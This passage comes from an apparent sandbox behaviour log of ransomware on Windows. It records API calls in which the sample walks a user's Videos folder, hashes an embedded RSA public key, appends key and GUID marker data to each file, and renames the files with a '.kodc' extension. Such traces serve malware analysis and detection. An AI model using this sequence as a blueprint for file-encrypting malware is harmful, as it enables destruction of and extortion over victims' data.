hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0099.999] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0099.999] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6948b0 | out: hHeap=0x630000) returned 1 [0100.000] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0100.000] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0100.000] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7b60 | out: hHeap=0x630000) returned 1 [0100.000] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0100.000] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0100.000] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0100.000] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7b48 | out: hHeap=0x630000) returned 1 [0100.000] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7b18 | out: hHeap=0x630000) returned 1 [0100.000] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0100.000] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0100.000] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0100.000] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7b00 | out: hHeap=0x630000) returned 1 [0100.000] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9c1d8 | out: hHeap=0x630000) returned 1 [0100.000] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0100.000] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0100.000] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0100.000] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0100.000] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0100.000] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0100.000] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0100.000] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0100.000] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0100.000] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0100.000] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0100.000] WriteFile (in: hFile=0x5cc, lpBuffer=0x9bb8968*, nNumberOfBytesToWrite=0x18d11, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x9bb8968*, lpNumberOfBytesWritten=0x9e2fb14*=0x18d11, lpOverlapped=0x0) returned 1 [0100.001] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8968 | out: hHeap=0x630000) returned 1 [0100.001] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x18d16, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.001] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0100.001] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0100.001] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce548 [0100.001] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x9b9c950 [0100.001] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9b9c950, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0100.001] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x333b018 [0100.001] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9c950 | out: hHeap=0x630000) returned 1 [0100.001] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce548 | out: hHeap=0x630000) returned 1 [0100.001] WriteFile (in: hFile=0x5cc, lpBuffer=0x333b018*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x333b018*, lpNumberOfBytesWritten=0x9e2fb50*=0x28, lpOverlapped=0x0) returned 1 [0100.001] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0100.001] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0100.001] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0100.001] CloseHandle (hObject=0x5cc) returned 1 [0100.003] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce548 [0100.003] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x870) returned 0x333bc58 [0100.003] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce548 | out: hHeap=0x630000) returned 1 [0100.003] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\7vpzR.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\7vpzr.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\7vpzR.mkv.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\7vpzr.mkv.kodc")) returned 1 [0100.004] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0100.004] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0100.004] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.005] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33362c8 | out: hHeap=0x630000) returned 1 [0100.005] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd27f500, ftCreationTime.dwHighDateTime=0x1d5c5e3, ftLastAccessTime.dwLowDateTime=0xfb8f8960, ftLastAccessTime.dwHighDateTime=0x1d5b7fb, ftLastWriteTime.dwLowDateTime=0xfb8f8960, ftLastWriteTime.dwHighDateTime=0x1d5b7fb, nFileSizeHigh=0x0, nFileSizeLow=0x10381, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8x4vGOYXgMiqx2szYMtl.flv", cAlternateFileName="8X4VGO~1.FLV")) returned 1 [0100.005] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33183f8 [0100.005] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6932f0 [0100.005] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0100.005] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\8x4vGOYXgMiqx2szYMtl.flv") returned=".flv" [0100.006] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\8x4vGOYXgMiqx2szYMtl.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\8x4vgoyxgmiqx2szymtl.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0100.006] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=66433) returned 1 [0100.006] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0100.008] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x1035b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.009] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0100.009] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0100.009] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0100.009] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.009] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x10381, lpOverlapped=0x0) returned 1 [0100.010] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.010] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0100.010] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.010] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.010] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x693378) returned 1 [0100.011] CryptCreateHash (in: hProv=0x693378, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0100.011] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0100.011] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0100.011] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0100.011] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0100.011] GetLastError () returned 0x0 [0100.011] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0100.012] CryptReleaseContext (hProv=0x693378, dwFlags=0x0) returned 1 [0100.012] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0100.012] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0100.012] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0100.012] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0100.012] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0100.012] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0100.012] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0100.012] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10380) returned 0x9ba6d90 [0100.012] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0100.012] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0100.012] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0100.012] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0100.012] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0100.013] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0100.013] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9c1d8 [0100.013] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7b00 [0100.013] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9c220 [0100.013] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7b18 [0100.013] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7b48 [0100.013] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0100.013] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7b60 [0100.013] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0100.013] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0100.013] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0100.013] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0100.013] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7b48 | out: hHeap=0x630000) returned 1 [0100.013] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7b60 | out: hHeap=0x630000) returned 1 [0100.013] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0100.014] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0100.014] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0100.014] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0100.014] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec90 [0100.014] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7b60 [0100.014] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32aed00 [0100.014] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x9bb7b48 [0100.014] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec40 [0100.014] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c428 [0100.014] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0100.014] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0100.014] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0100.015] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x10381, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.015] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0100.015] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0100.015] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0100.015] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0100.015] CloseHandle (hObject=0x5cc) returned 1 [0100.017] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\8x4vGOYXgMiqx2szYMtl.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\8x4vgoyxgmiqx2szymtl.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\8x4vGOYXgMiqx2szYMtl.flv.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\8x4vgoyxgmiqx2szymtl.flv.kodc")) returned 1 [0100.017] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0100.018] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0100.018] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.019] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6932f0 | out: hHeap=0x630000) returned 1 [0100.019] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce8166e0, ftCreationTime.dwHighDateTime=0x1d5b9af, ftLastAccessTime.dwLowDateTime=0x837fd9b0, ftLastAccessTime.dwHighDateTime=0x1d5b856, ftLastWriteTime.dwLowDateTime=0x837fd9b0, ftLastWriteTime.dwHighDateTime=0x1d5b856, nFileSizeHigh=0x0, nFileSizeLow=0x4193, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9siqfvi4c0aYkxA3.swf", cAlternateFileName="9SIQFV~1.SWF")) returned 1 [0100.019] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9siqfvi4c0aYkxA3.swf") returned=".swf" [0100.019] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9siqfvi4c0aYkxA3.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9siqfvi4c0aykxa3.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0100.019] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=16787) returned 1 [0100.019] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0100.023] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x416d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.023] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0100.024] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0100.024] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0100.024] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.024] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x4193, lpOverlapped=0x0) returned 1 [0100.024] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.025] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0100.025] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.025] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.025] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x693378) returned 1 [0100.026] CryptCreateHash (in: hProv=0x693378, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0100.026] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0100.026] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0100.026] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0100.026] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0100.026] GetLastError () returned 0x0 [0100.026] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0100.026] CryptReleaseContext (hProv=0x693378, dwFlags=0x0) returned 1 [0100.026] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0100.026] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0100.026] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0100.026] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0100.026] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0100.026] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0100.027] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0100.027] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4190) returned 0x9ba6d90 [0100.027] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, 